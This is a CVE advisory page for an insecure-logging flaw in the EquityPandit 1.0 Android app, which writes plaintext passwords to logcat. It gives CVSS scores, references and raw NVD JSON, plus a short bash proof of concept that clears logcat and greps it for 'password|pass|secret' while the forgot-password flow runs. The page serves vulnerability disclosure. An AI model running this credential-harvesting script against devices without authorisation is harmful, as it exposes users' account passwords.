Security Vulnerability Report
CVE-2019-25605 CVSS 7.5 HIGH


Published: 2026-03-22 14:16:28
Last Modified: 2026-04-15 15:00:33

Description

EquityPandit 1.0 contains an insecure logging vulnerability that allows attackers to capture sensitive user credentials by accessing developer console logs via Android Debug Bridge. Attackers can use adb logcat to extract plaintext passwords logged during the forgot password function, exposing user account credentials.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

EquityPandit 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2019-25605: EquityPandit Insecure Logging
# Description: Retrieves plaintext passwords from Android logcat.

# Step 1: Check ADB connection
adb devices

# Step 2: Clear logcat buffer to reduce noise
adb logcat -c

# Step 3: Instruct user to trigger the 'Forgot Password' function on the device
echo "Please trigger the 'Forgot Password' function on the EquityPandit app now..."

# Step 4: Monitor logs for potential password leaks
# Common keywords to search for: 'password', 'pass', 'secret', or specific app package
adb logcat -v time | grep -i -E "password|pass|secret"

References

https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit
https://www.exploit-db.com/exploits/46933
https://www.vulncheck.com/advisories/equitypandit-insecure-logging-information-disclosure

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25605", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:28.260", "lastModified": "2026-04-15T15:00:32.790", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "EquityPandit 1.0 contains an insecure logging vulnerability that allows attackers to capture sensitive user credentials by accessing developer console logs via Android Debug Bridge. Attackers can use adb logcat to extract plaintext passwords logged during the forgot password function, exposing user account credentials."}, {"lang": "es", "value": "EquityPandit 1.0 contiene una vulnerabilidad de registro inseguro que permite a los atacantes capturar credenciales de usuario sensibles al acceder a los registros de la consola de desarrollador a través de Android Debug Bridge. Los atacantes pueden usar adb logcat para extraer contraseñas en texto plano registradas durante la función de recuperación de contraseña, exponiendo las credenciales de la cuenta de usuario."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-612"}]}], "references": [{"url": "https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46933", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/equitypandit-insecure-logging-information-disclosure", "source": "[email protected]"}]}}